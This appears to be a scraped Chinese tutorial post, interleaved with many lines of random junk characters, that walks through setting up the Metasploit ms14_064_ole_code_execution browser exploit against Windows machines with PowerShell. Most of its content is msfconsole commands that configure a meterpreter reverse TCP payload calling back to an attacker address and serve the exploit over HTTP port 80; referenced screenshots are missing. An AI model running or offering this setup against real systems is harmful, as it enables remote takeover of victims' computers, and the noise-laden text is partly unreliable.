" C5 T+ V. F% } 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示+ B$ l* d5 `1 O9 b! Q
/ S# f1 B/ d9 J4 Q( @5 p
% L; H8 ]! T5 j4 p5 O$ `
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
' ^8 {1 C g; @! J' c; @
2 X: o- C! |+ R) J2 _
' q" p9 s/ S9 |, G' C 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
. y* f5 x5 m, i; e
! S6 l" g9 S- B$ q/ X* P
2 p V% F# h. r" _! ^ set AllowPowershellPrompt true
% Q- h' ^' K, Z+ C
1 Y) f' R1 i7 w- ~& }4 }4 \
8 @1 O" G y. x' g
Set LHOST 192.168.0.109
! H' \0 J' f: E0 k; {# _& e
* m3 b5 o- q# t- H8 B
$ w* U3 a* W; U) O n set SRVHOST 192.168.0.109. I$ R- X" |8 b `: P9 ]* W
7 `5 D! ?2 ?! e: `: l
& V: @8 ~& ~# { Set uripath share
+ Z5 X1 u: Q" Y$ y! ?
$ S) s/ h7 c( s* j, u% S3 M
5 d/ u9 J/ _! `/ K8 r Set srvport 80
& C1 b% w3 d4 F
9 e! z9 {2 m$ x a
, d! U0 `2 h2 ^' u) X4 M
+ }! X# R1 `% q$ m# w4 B# [
1 G2 c4 S3 D% H- y8 _
x9 u9 C* z* v" ^) T0 R
$ {- S) ?9 L9 u
3 @+ [4 ]: x) E- V
- W7 b | `2 M( G( M7 ?
9 K! P, B0 y l
2 [9 h. M d+ j$ ^2 O
" V0 T5 j8 f: z \! Y; i0 C : H8 H4 Z" o9 Q5 i
4 r. C# l3 o8 V" B
; o2 M0 ~! S* J1 ~! m0 e# ~. ]
- G- p3 H3 S( X; c' S9 F; A
. M" q0 C5 k$ \4 {8 u2 P2 p) z# |! x: ^2 F* t& O6 P, C s
下面我们来访问本地地址如图:+ {5 b. |+ u# O5 N5 V
. k7 K! d9 s D e5 ^: n# O* [
9 D/ J: T! X( u0 R# o 3 T- m5 P: A' L
$ G0 P) C. G5 i' Q/ u+ d7 i% e
/ q% x# S: r* @' \4 }8 `7 u
" ?( t/ g( q H8 g
8 j1 }6 J: L" a K j
6 S W& H( X* r7 q- Q' w p+ v$ F
6 ~" E$ w+ L0 ^& ~5 }( V